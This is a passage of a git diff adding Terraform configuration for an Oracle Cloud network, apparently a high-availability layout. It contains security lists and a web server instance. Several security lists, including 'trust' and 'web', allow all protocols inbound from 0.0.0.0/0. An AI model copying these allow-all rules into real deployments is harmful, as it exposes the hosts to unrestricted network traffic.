+ source = "0.0.0.0/0" + stateless = false + } +} +resource "oci_core_security_list" "trust" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "SL-trust" + egress_security_rules { + protocol = "all" + destination = "0.0.0.0/0" + stateless = false + } + ingress_security_rules { + protocol = "all" + source = "0.0.0.0/0" + stateless = false + } +} +resource "oci_core_security_list" "web" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "SL-web" + egress_security_rules { + protocol = "all" + destination = "0.0.0.0/0" + stateless = false + } + ingress_security_rules { + protocol = "all" + source = "0.0.0.0/0" + stateless = false + } +} \ No newline at end of file diff --git a/oci/HA/server.tf b/oci/HA/server.tf new file mode 100644 index 00000000..9a64b4eb --- /dev/null +++ b/oci/HA/server.tf @@ -0,0 +1,26 @@ +resource "oci_core_instance" "web1" { + availability_domain = "${var.server_availability_domain}" + compartment_id = "${oci_identity_compartment.compartment.id}" + display_name = "web1" + shape = "${var.server_shape_size}" + + create_vnic_details { + subnet_id = "${oci_core_subnet.web.id}" + display_name = "web1" + private_ip = "${var.web1_ip}" + assign_public_ip = false + } + + source_details { + source_type = "image" + source_id = "${var.ubuntu_image_ocid[var.region]}" + boot_volume_size_in_gbs = "60" + } + metadata = { + ssh_authorized_keys = "${var.ssh_authorized_key}" + #user_data = "${base64encode(file("./userdata/bootstrap"))}" + } + timeouts { + create = "60m" + } +} \ No newline at end of file diff --git a/oci/HA/terraform.tfvars b/oci/HA/terraform.tfvars new file mode 100644 index 00000000..61c5ee9f --- /dev/null +++ b/oci/HA/terraform.tfvars @@ -0,0 +1,32 @@ +tenancy_ocid = "